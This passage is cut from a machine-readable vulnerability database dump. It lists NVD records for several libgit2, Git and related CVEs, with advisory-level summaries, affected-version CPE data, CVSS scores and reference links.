"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.libssh2.org", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-347", }, ], source: "security-advisories@github.com", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2020-04-27 17:15
Modified
2024-11-21 04:59
Severity ?
Summary
An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| libgit2 | libgit2 | * | |
| debian | debian_linux | 9.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "FE4A6653-6AAA-4AE1-A3BB-7EDD3BB80EAD", versionEndExcluding: "0.28.4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352.", }, { lang: "es", value: "Se descubrió un problema en libgit2 versiones anteriores a 0.28.4 y versiones 0.9x anteriores a 0.99.0. El archivo path.c maneja inapropiadamente los nombres de archivo equivalentes que existen debido al Flujo de Datos Alternativo de NTFS. Esto puede permitir una ejecución de código remota al clonar un repositorio. Este problema es similar a CVE-2019-1352.", }, ], id: "CVE-2020-12278", lastModified: "2024-11-21T04:59:26.073", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-04-27T17:15:13.407", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://github.com/git/git/security/advisories/GHSA-5wph-8frv-58vj", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/3f7851eadca36a99627ad78cbe56a40d3776ed01", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/e1832eb20a7089f6383cfce474f213157f5300cb", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "cve@mitre.org", url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/git/git/security/advisories/GHSA-5wph-8frv-58vj", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/3f7851eadca36a99627ad78cbe56a40d3776ed01", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/e1832eb20a7089f6383cfce474f213157f5300cb", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-706", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2020-02-12 02:15
Modified
2024-11-21 02:20
Severity ?
Summary
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "BDA7AD30-7C02-418F-A62D-9C4C179088DB", versionEndExcluding: "1.8.5.6", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "639D829A-5F78-49EB-924E-F6495EEB5153", versionEndExcluding: "1.9.5", versionStartIncluding: "1.9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "9080C10B-548A-45AF-9B62-F80B92EEB4F4", versionEndExcluding: "2.0.5", versionStartIncluding: "2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "853D6A11-7FA6-4A92-87E2-6F7756E1C96A", versionEndExcluding: "2.1.4", versionStartIncluding: "2.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "BDEC04F1-09CA-4957-90B6-5D87A68C2C06", versionEndExcluding: "2.2.1", versionStartIncluding: "2.2.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*", matchCriteriaId: "4781BF1E-8A4E-4AFF-9540-23D523EE30DD", vulnerable: false, }, { criteria: "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", matchCriteriaId: "A2572D17-1DE6-457B-99CC-64AFD54487EA", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*", matchCriteriaId: "99B4890E-102C-442D-AB16-4D859A595656", versionEndExcluding: "3.2.3", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*", matchCriteriaId: "4781BF1E-8A4E-4AFF-9540-23D523EE30DD", vulnerable: false, }, { criteria: "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", matchCriteriaId: "A2572D17-1DE6-457B-99CC-64AFD54487EA", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*", matchCriteriaId: "8DDD1870-453C-4B97-BE7B-9B3D6D4856D4", versionEndIncluding: "6.1.1", vulnerable: true, }, { criteria: "cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*", matchCriteriaId: "9D061C24-F869-456D-8D26-8B6F63B6C834", vulnerable: true, }, { criteria: "cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*", matchCriteriaId: "0CD44704-4632-43DC-BC56-F872BCAF3E97", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:eclipse:egit:*:*:*:*:*:*:*:*", matchCriteriaId: "EB77E9A5-6A32-42BE-81C0-7D87A2076688", versionEndExcluding: "08-12-2014", vulnerable: true, }, { criteria: "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*", matchCriteriaId: "D5351751-FCFD-429E-8FF4-B8E9954D7248", versionEndExcluding: "3.4.2", vulnerable: true, }, { criteria: "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*", matchCriteriaId: "D1B88228-1044-4794-A954-A1CA8954D1BA", versionEndExcluding: "3.5.3", versionStartIncluding: "3.5.0", vulnerable: true, }, { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "973A3E4A-6E15-4137-9933-4609A9CC805C", versionEndExcluding: "0.21.3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, { lang: "es", value: "Git versiones anteriores a 1.8.5.6, versiones 1.9.x anteriores a 1.9.5, versiones 2.0.x anteriores a 2.0.5, versiones 2.1.x anteriores a 2.1.4 y versiones 2.2.x anteriores a 2.2.1 en Windows y OS X; Mercurial versiones anteriores a 3.2.3 en Windows y OS X; Apple Xcode versiones anteriores a 6.2 beta 3; mine todas las versiones antes del 08-12-2014; libgit2 todas las versiones hasta 0.21. 2; Egit todas las versiones anteriores al 08-12-2014; y JGit todas las versiones anteriores al 08-12-2014 permiten a los servidores Git remotos ejecutar comandos arbitrarios por medio de un árbol que contiene un archivo .git/config diseñado con (1) un punto de código Unicode ignorable, (2) una representación git~1/config, o (3) mayúsculas y minúsculas que no son manejadas apropiadamente en un sistema de archivos insensible a mayúsculas y minúsculas", }, ], id: "CVE-2014-9390", lastModified: "2024-11-21T02:20:45.663", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-02-12T02:15:10.963", references: [ { source: "cve@mitre.org", tags: [ "Broken Link", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://securitytracker.com/id?1031404", }, { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "http://support.apple.com/kb/HT204147", }, { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { source: "cve@mitre.org", tags: [ "Product", ], url: "https://libgit2.org/security/", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://news.ycombinator.com/item?id=8769667", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://securitytracker.com/id?1031404", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "http://support.apple.com/kb/HT204147", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Product", ], url: "https://libgit2.org/security/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://news.ycombinator.com/item?id=8769667", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-20", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-07-10 14:29
Modified
2024-11-21 03:42
Severity ?
Summary
A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| libgit2 | libgit2 | * | |
| debian | debian_linux | 8.0 | |
| debian | debian_linux | 9.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "733BF26A-72FB-4851-928E-4F7759FEF8E2", versionEndExcluding: "0.27.3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", }, { lang: "es", value: "Se ha descubierto un problema en versiones anteriores a la 0.27.3 de libgit2. Se ha descubierto que una extensión sign inesperada en la función git_delta_apply en el archivo delta.c puede conducir a un desbordamiento de enteros que conduce a una lectura fuera de límites, lo que le permite leer antes del objeto base. Un atacante podría explotar este error para filtrar direcciones de memoria o provocar una denegación de servicio (DoS).", }, ], id: "CVE-2018-10887", lastModified: "2024-11-21T03:42:13.670", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5.8, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:N/C:P/I:N/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 4.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 8.1, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 5.2, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-07-10T14:29:00.260", references: [ { source: "secalert@redhat.com", tags: [ "Issue Tracking", "Patch", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598021", }, { source: "secalert@redhat.com", tags: [ "Patch", ], url: "https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a", }, { source: "secalert@redhat.com", tags: [ "Patch", ], url: "https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22", }, { source: "secalert@redhat.com", tags: [ "Patch", "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { source: "secalert@redhat.com", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { source: "secalert@redhat.com", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598021", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "https://github.com/libgit2/libgit2/commit/3f461902dc1072acb8b7607ee65d0a0458ffac2a", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "https://github.com/libgit2/libgit2/commit/c1577110467b701dcbcf9439ac225ea851b47d22", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], sourceIdentifier: "secalert@redhat.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-194", }, ], source: "secalert@redhat.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-125", }, { lang: "en", value: "CWE-190", }, { lang: "en", value: "CWE-681", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-08-18 02:29
Modified
2024-11-21 03:50
Severity ?
Summary
In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol "ng" packet that lacks a '\0' byte to trigger an out-of-bounds read that leads to DoS.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| debian | debian_linux | 8.0 | |
| debian | debian_linux | 9.0 | |
| libgit2 | libgit2 | * | |
| libgit2 | libgit2 | * |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "89FF27DE-63AA-49F8-942C-D55095953C5E", versionEndExcluding: "0.26.6", vulnerable: true, }, { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "5A27D980-CE50-4F8E-ACF8-F87D4A924FF5", versionEndExcluding: "0.27.4", versionStartIncluding: "0.27.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol \"ng\" packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS.", }, { lang: "es", value: "En ng_pkt en transports/smart_pkt.c en libgit2 antes de 0.26.6 y 0.27.x antes de 0.27.4, un atacante remoto puede enviar un paquete \"ng\" de protocolo inteligente manipulado que le falte un byte \"\\0\" para activar una lectura fuera de límites que conduzca a una denegación de servicio (DoS).", }, ], id: "CVE-2018-15501", lastModified: "2024-11-21T03:50:56.910", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-08-18T02:29:01.713", references: [ { source: "cve@mitre.org", tags: [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.suse.com/show_bug.cgi?id=1104641", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.26.6", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.4", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9406", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.suse.com/show_bug.cgi?id=1104641", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/1f9a8510e1d2f20ed7334eeeddb92c4dd8e7c649", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.26.6", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.4", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.pro-linux.de/sicherheit/2/44650/denial-of-service-in-libgit2.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-125", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-03-14 00:29
Modified
2024-11-21 04:13
Severity ?
Summary
Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe | Patch, Third Party Advisory | |
| cve@mitre.org | https://libgit2.github.com/security/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://libgit2.github.com/security/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | Mailing List, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| libgit2 | libgit2 | * | |
| debian | debian_linux | 9.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "1B57F6BF-68C5-4FB6-940E-022FD722FF41", versionEndExcluding: "0.26.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file.", }, { lang: "es", value: "El retorno incorrecto de un código de error en la función index.c:read_entry() conduce a una doble liberación (double free) en libgit2, en versiones anteriores a la v0.26.2, que permite que un atacante provoque una denegación de servicio (DoS) mediante un archivo de índice de repositorios manipulado.", }, ], id: "CVE-2018-8099", lastModified: "2024-11-21T04:13:15.477", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: 